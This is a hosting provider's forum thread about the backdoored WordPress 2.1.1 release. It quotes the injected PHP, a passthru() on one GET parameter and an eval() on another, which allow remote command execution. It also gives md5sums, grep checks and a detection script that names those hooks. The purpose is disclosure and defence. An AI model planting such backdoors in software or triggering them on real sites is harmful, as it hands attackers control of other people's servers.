03/02/07 - WordPress 2.1.1 Trojaned/Backdoored
If you use WordPress, and have downloaded and/or installed 2.1.1, you should see this:
http://wordpress.org/development/2007/03/upgrade-212/
The trojan appears to exist in the following files (the line numbers are where the added code sits in each file):
theme.php, lines 408-410 and 441 - passthru backdoor:
function get_theme_mcommand($mcds) {
    passthru($mcds);
}
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
feed.php, lines 84-86 and 149 - eval backdoor:
function comment_text_phpfilter($filterdata) {
    eval($filterdata);
}
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
md5sums of 2 trojaned files:
76be4c737295030a90f5d554b1c687f2 feed.php
2aa5e7dbfb354dce6e407c43b3db8f41 theme.php
Be sure to check your recent WordPress 2.1.1 installs for these, and take appropriate measures to update accordingly, as these trojans can allow for remote command execution, which is basically the equivalent of giving someone shell access to your server.
If you have any questions, please feel free to ask here.
As of this time, all managed dedicated and VDS customers have been checked, as have all shared servers (regular webhosting and reseller accounts). Emails were dispatched to any customers (or resellers if a customer of a customer) who were found to have the trojaned version of WordPress. If you have not been contacted by us and are running WordPress 2.1.1, it would be a good idea to double check your installs just to be safe.
Patrick
03-06-2007, 04:37 PM
As of this time, all managed dedicated and VDS customers have been checked, as have all shared servers (regular webhosting and reseller accounts). Emails were dispatched to any customers (or resellers if a customer of a customer) who were found to have the trojaned version of WordPress. If you have not been contacted by us and are running WordPress 2.1.1, it would be a good idea to double check your installs just to be safe.
I was told cPanel servers were not affected by this security news?
Hi Patrick,
It depends. The hacked version of WordPress works on any server that WordPress can run on, which includes servers that have cPanel installed.
That said, WordPress comes with Fantastico, if that package is enabled in your Fantastico feature set. You can see what packages are enabled in your Fantastico feature set by logging into WHM and clicking the Fantastico link near the bottom of the page.
Ultimately your best bet would be to see if the WordPress archive exists in your Fantastico directory, and if so, check the theme.php and feed.php for the backdoors, like this:
As root:
1. cd /var/netenberg/archives/fantastico_de_luxe
2. tar zxvf WordPress.tgz
3. cd WordPress/wp-includes
4. egrep 'get_theme_mcommand|comment_text_phpfilter' feed.php theme.php
If you don't get any output, the backdoors mentioned in this thread do not exist. Please let me know if this answers your questions, thanks.
I should note the above instructions apply to VDS and dedicated customers only. If you are a regular webhosting or Reseller customer, or managed VDS or dedicated customer, we have already checked the servers to include the Fantastico archives on the 2nd when this thread was posted.
According to Netenberg - the developers of Fantastico:
http://www.netenberg.com/forum/viewtopic.php?t=5562
Is the current 2.11 version on Fantastico at risk for this problem?
No. WordPress 2.1.1 was included in Fantastico over 8 days ago (http://netenberg.com/forum/viewtopic.php?t=5544). This exploit only affects the copy that was downloaded within the past 3-4 days.
I had checked their forums on the 2nd, the day the advisory was released, and there wasn't any information posted there at the time. However, it appears the information above was posted the following day, which states that the version of WordPress included with Fantastico was in fact not affected.
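The two checks described in this thread, the md5sums from the opening post and the egrep for the backdoor function names from the Fantastico steps above, combined into one script. This is an added example, not code from the thread, from the hosting provider or from WordPress. It assumes the directory you point it at has a wp-includes/ subdirectory (a live install, or the WordPress/ directory extracted from WordPress.tgz as in the steps above), that grep -E is available, and that either coreutils md5sum or BSD md5 exists; the sample tree it builds for the stand-alone run is constructed and carries only the $_GET hook line quoted in the thread. The grep also matches the "ix"/"iz" GET hooks, so a repacked copy whose md5 no longer matches the published sums is still flagged.

```shell
#!/bin/sh
# Added example (not from the thread): scan a WordPress tree for the two
# backdoor indicators quoted above. Works on a live install or on the
# WordPress/ directory extracted from a Fantastico archive.
# Usage: check_wp_backdoor /path/to/wordpress ; exit 0 = clean, 1 = indicator found

# md5sums of the trojaned files as published in the opening post
BAD_FEED_MD5="76be4c737295030a90f5d554b1c687f2"
BAD_THEME_MD5="2aa5e7dbfb354dce6e407c43b3db8f41"
# function names and GET hooks from the posted code; catches repacked copies
# whose md5 no longer matches the published sums
SIGNATURES='get_theme_mcommand|comment_text_phpfilter|\$_GET\["i[xz]"'

# md5 of a file using whichever tool is present (coreutils md5sum or BSD md5)
file_md5() {
    if command -v md5sum >/dev/null 2>&1; then
        md5sum "$1" | cut -d' ' -f1
    else
        md5 -q "$1"
    fi
}

# Check wp-includes/feed.php and wp-includes/theme.php under the given tree.
# Prints findings; returns 0 when nothing matched, 1 when any indicator hit.
check_wp_backdoor() {
    wpdir="$1"
    found=0
    for name in feed.php theme.php; do
        path="$wpdir/wp-includes/$name"
        if [ ! -f "$path" ]; then
            echo "missing: $path (not a WordPress tree?)"
            continue
        fi
        sum=$(file_md5 "$path")
        if [ "$name" = "feed.php" ] && [ "$sum" = "$BAD_FEED_MD5" ]; then
            echo "KNOWN-BAD md5 $sum: $path"; found=1
        elif [ "$name" = "theme.php" ] && [ "$sum" = "$BAD_THEME_MD5" ]; then
            echo "KNOWN-BAD md5 $sum: $path"; found=1
        fi
        # "|| true" keeps a no-match (grep exit 1) from aborting under set -e
        hits=$(grep -nE "$SIGNATURES" "$path" || true)
        if [ -n "$hits" ]; then
            echo "SUSPICIOUS code in $path:"
            echo "$hits" | sed 's/^/    /'
            found=1
        fi
    done
    return $found
}

# Stand-alone demo on a constructed tree. A real run points at a live install
# or at the Fantastico archive extracted as in the steps above.
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/wp-includes"
printf '<?php\nfunction get_theme() {}\n' > "$demo_dir/wp-includes/theme.php"
# constructed feed.php carrying only the hook line quoted in the thread
printf '<?php\nif ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }\n' > "$demo_dir/wp-includes/feed.php"
if check_wp_backdoor "$demo_dir"; then
    echo "clean"
else
    echo "indicators found; treat the install as compromised and reinstall from a fresh 2.1.2 download"
fi
rm -rf "$demo_dir"
```

Run it as the account owner or root against each install; a missing-file line means the path is not a WordPress tree, a KNOWN-BAD line means the file is byte-for-byte the trojaned one, and a SUSPICIOUS line with no md5 match still warrants replacing the file from a clean download.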
Patrick
03-06-2007, 09:58 PM
Well I just wanted to clarify the issue. :)